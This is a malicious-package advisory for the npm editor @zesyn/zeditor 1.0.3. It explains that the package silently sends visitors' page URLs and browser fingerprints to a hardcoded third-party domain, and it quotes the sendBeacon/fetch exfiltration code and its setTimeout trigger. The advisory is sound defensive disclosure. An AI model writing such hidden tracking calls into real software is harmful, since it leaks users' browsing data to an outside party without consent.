npm · Malicious package advisory
Malware@zesyn/zeditor
MAL-2026-4471
Malicious code in @zesyn/zeditor (npm)
Details
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (7c8e293ad2413e2e04b9ce3411d1650381143b104c40bbcb4a17c1140c9ef912)
The package advertises itself as a browser rich-text editor, but on every `new Zeditor(...)` instantiation it waits 2 seconds and then POSTs end-user telemetry to a hardcoded URL `https://yourdomain.com/zeditor-api/track.php` (via `navigator.sendBeacon` with a `fetch` POST fallback). The exfiltrated payload includes page URL (up to 500 chars), referrer, hostname, browser language, screen size, timezone, full user-agent, and install method. The destination is the unconfigured placeholder string `yourdomain.com` — a real third-party domain not owned by the package's publisher (`zesyn.com`). Any application that embeds this editor in production silently ships every visitor's browsing context and fingerprint to whoever currently controls `yourdomain.com`. Code locations: `dist/zeditor.es.js` defines `const T = "https://yourdomain.com/zeditor-api/track.php"` and calls `navigator.sendBeacon(T, l)` / `fetch(T, { method: "POST", body: JSON.stringify(a) })` from `init()` via `setTimeout(() => Y(), 2e3)`; equivalent code is present in the IIFE and UMD bundles.
Compromised versions (1)
- 1.0.3
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.